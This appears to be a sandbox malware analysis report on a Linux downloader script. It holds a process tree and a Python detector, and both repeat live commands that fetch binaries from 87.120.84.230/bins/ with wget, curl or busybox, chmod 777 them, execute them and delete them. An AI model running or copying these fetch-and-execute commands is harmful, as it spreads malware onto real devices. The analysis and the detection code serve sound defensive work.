  PID 914  /tmp/2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA  ./2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA  [EXE]
  PID 915  /bin/rm  rm 2K1Stp7F2zacgsgGNljVkmxv8Mplrh5KmA
  PID 916  /usr/bin/wget  wget http://87.120.84.230/bins/oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz
  PID 917  /usr/bin/curl  curl -O http://87.120.84.230/bins/oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz  [CPU][RSI][TMP]
  PID 918  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz
  PID 919  /bin/chmod  chmod 777 oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz  [PERM]
  PID 920  /tmp/oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz  ./oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz  [EXE]
  PID 921  /bin/rm  rm oi785cYkkWE3ZOFzQVCKD1p7nl1VMhEaqz
  PID 922  /usr/bin/wget  wget http://87.120.84.230/bins/OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw93
  PID 923  /usr/bin/curl  curl -O http://87.120.84.230/bins/OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw93  [CPU][RSI][TMP]
  PID 924  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw93
  PID 925  /bin/chmod  chmod 777 OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw93  [PERM]
  PID 926  /tmp/OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw93  ./OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw93  [EXE]
  PID 927  /bin/rm  rm OPIHMLzJqIxbiqjnuqyn9htm7VedKCZw93
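The process tree above is the whole behaviour of the sample: fetch a file with whichever of wget, curl or busybox wget is present, chmod 777 it, run it from /tmp, delete it, repeat for the next file name. The detector below, an added example that is not part of the sandbox output or of the sample, correlates those stages per downloaded file name across a list of (pid, command line) events and flags a name only when download, chmod with an execute bit and execution are all seen in that order, so a lone "chmod 777 x" or "./x" does not fire. The event list is constructed: the first two iterations are copied from the tree above, the example.invalid download and the "chmod 644" line are invented benign noise that must not trigger.

```python
"""Flag the fetch -> chmod +x -> execute -> delete loop of a multi-architecture
downloader script in a sandbox process list.  Added example; SAMPLE_EVENTS is
constructed from the process tree of this report plus two invented noise lines."""
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

SAMPLE_EVENTS = [  # (pid, command line)
    (650, "rm bins.sh"),
    (653, "wget http://87.120.84.230/bins/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4"),
    (669, "curl -O http://87.120.84.230/bins/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4"),
    (676, "/bin/busybox wget http://87.120.84.230/bins/TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4"),
    (679, "chmod 777 TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4"),
    (680, "./TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4"),
    (681, "rm TYpMHqGzEyP8rTOoVMYt2X3auI9UeuIsI4"),
    (682, "wget http://87.120.84.230/bins/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA"),
    (683, "curl -O http://87.120.84.230/bins/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA"),
    (684, "/bin/busybox wget http://87.120.84.230/bins/zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA"),
    (687, "chmod 777 zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA"),
    (688, "./zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA"),
    (689, "rm zKX1kYJznU9naP27HQEu7aox0tVZhGvPxA"),
    (700, "curl -O http://example.invalid/pkgs/tool-1.0.tar.gz"),  # constructed noise
    (701, "chmod 644 notes.txt"),                                   # constructed noise
]

STAGES = ("download", "chmod_exec", "execute", "delete")
_DOWNLOAD = re.compile(r"^(?P<bb>/bin/busybox\s+)?(?P<tool>wget|curl)\b.*?(?P<url>https?://\S+)")
_CHMOD = re.compile(r"^chmod\s+(?P<mode>[0-7]{3,4})\s+(?P<name>\S+)$")
_EXEC = re.compile(r"^(?:\./|/tmp/)(?P<name>[^/\s]+)$")
_RM = re.compile(r"^rm\s+(?P<name>\S+)$")


@dataclass
class Chain:
    stages: set = field(default_factory=set)
    urls: set = field(default_factory=set)
    fetchers: set = field(default_factory=set)


@dataclass
class DropperReport:
    chains: dict = field(default_factory=dict)   # basename -> Chain
    flagged: list = field(default_factory=list)  # basenames with download+chmod+execute

    def hosts(self):
        return sorted({urlsplit(u).hostname for n in self.flagged for u in self.chains[n].urls})

    def fetchers(self):
        return sorted(set().union(*(self.chains[n].fetchers for n in self.flagged)))


def _mode_has_exec(mode):
    # Execute is the low bit of each of the last three octal digits (u/g/o).
    return any(int(d) & 1 for d in mode[-3:])


def classify(cmdline):
    """Map one command line to (stage, basename, detail), or None if uninteresting."""
    m = _DOWNLOAD.match(cmdline)
    if m:
        url, tool = m.group("url"), ("busybox " if m.group("bb") else "") + m.group("tool")
        return "download", urlsplit(url).path.rsplit("/", 1)[-1], {"url": url, "tool": tool}
    m = _CHMOD.match(cmdline)
    if m and _mode_has_exec(m.group("mode")):
        return "chmod_exec", m.group("name").rsplit("/", 1)[-1], {"mode": m.group("mode")}
    m = _EXEC.match(cmdline)
    if m:
        return "execute", m.group("name"), {}
    m = _RM.match(cmdline)
    if m:
        return "delete", m.group("name").rsplit("/", 1)[-1], {}
    return None


def analyze(events):
    """Correlate stages per basename in PID order.  A stage only counts once the
    previous stage was seen for that name, so isolated chmod/exec do not fire."""
    report = DropperReport()
    for _pid, cmdline in sorted(events):
        hit = classify(cmdline)
        if hit is None:
            continue
        stage, name, detail = hit
        chain = report.chains.setdefault(name, Chain())
        if stage == "download":
            chain.urls.add(detail["url"])
            chain.fetchers.add(detail["tool"])
        prev = STAGES.index(stage) - 1
        if prev < 0 or STAGES[prev] in chain.stages:
            chain.stages.add(stage)
        if {"download", "chmod_exec", "execute"} <= chain.stages and name not in report.flagged:
            report.flagged.append(name)
    return report


def findings(report):
    """Analyst-facing summary lines derived from the report."""
    out = []
    if report.flagged:
        out.append(f"download->chmod->execute loop for {len(report.flagged)} file(s) from {report.hosts()}")
    if len(report.fetchers()) > 1:
        out.append("fetch fallbacks used: " + ", ".join(report.fetchers()))
    deleted = [n for n in report.flagged if "delete" in report.chains[n].stages]
    if deleted:
        out.append(f"{len(deleted)} executed file(s) deleted right after launch")
    return out
```

Run findings(analyze(SAMPLE_EVENTS)) to get the three summary lines; the same function fed the full 28-iteration tree from this report yields the same three findings with 14 flagged names and a single host. The fetch-fallback finding is worth keeping as its own indicator: trying wget, curl and busybox wget in turn against one URL is how these scripts cope with the varied toolsets of embedded devices, and a legitimate installer rarely does it.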
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97
This single 153-byte body is the only download recorded for the 28 fetches. It is far too small to be a bot binary and its size is consistent with a web-server error page, so the "dropped EXE" executions above most likely ran that response body rather than a working payload, which fits the absence of any post-execution signatures or network activity in this run. The hashes above are therefore not useful as payload indicators; the host 87.120.84.230, the /bins/ path and the 14 file names are the indicators this report supports.